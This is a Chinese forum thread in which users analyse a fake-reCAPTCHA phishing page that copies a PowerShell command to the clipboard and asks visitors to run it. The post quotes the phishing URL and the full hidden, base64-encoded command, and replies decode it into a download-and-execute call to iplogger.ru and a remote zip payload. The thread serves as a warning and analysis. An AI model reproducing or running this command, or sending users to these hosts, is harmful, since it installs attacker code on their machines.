我也遇到了,让你执行 win+R 的钓鱼网站

20160409 · 2024-10-15 20:30:25 · 105 次点击
弹窗广告,弹出了伪装 Google recaptcha 的验证界面,点击验证后变成图中这个、并把以下命令自动拷贝到了剪切板,让你执行。

供各位把玩。

**⚠除非你知道自己在干嘛,否则不要执行这个 powershell 命令。**

https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/CAptcha-verify-Approvals-system.html

>powershell -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAHIAdQAvADIANQAwADkAMgA1ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAA=

[![5202517f5bb3c7124748d8d.png]( https://shotcan.com/images/2024/10/15/5202517f5bb3c7124748d8d.png)]( https://shotcan.com/image/8DuT6)
举报· 105 次点击
登录 注册 站外分享
5 条回复  
colinlikepotatos 初学 2024-10-15 20:43:49
笑死,我 mac 打开的 都没识别一下
iorilu 小成 2024-10-15 20:51:00
拿这行命令什么意思呢, pwsh 可以用 base64 编码得命令?
CCddf 小成 2024-10-15 21:01:01
@iorilu iex (iwr https://iplogger.ru/250925 -UseBasicParsing).Content

iex Invoke-Expression Runs commands or expressions on the local computer.
iwr Invoke-WebRequest Gets content from a web page on the internet.
-UseBasicParsing  This parameter has been deprecated. Beginning with PowerShell 6.0.0, all Web requests use basic parsing only. This parameter is included for backwards compatibility only and any use of it has no effect on the operation of the cmdlet.
iqoo 小成 2024-10-15 21:10:53
收到过好几次,自称 github issue 回复的。连系统都不判断下,mac 系统发一个 exe 链接😂 给他压力测试了
PrinceofInj 小成 2024-10-15 22:20:51
解码了一下,实际是是下载 https://eu2.contabostorage.com/97c9beb737884d93a1899766d9f4e34c:gostired/leto15.zip 这个文件解压后执行,压缩包是啥就不知道了。不敢下载,怕被 IT 抓
返回顶部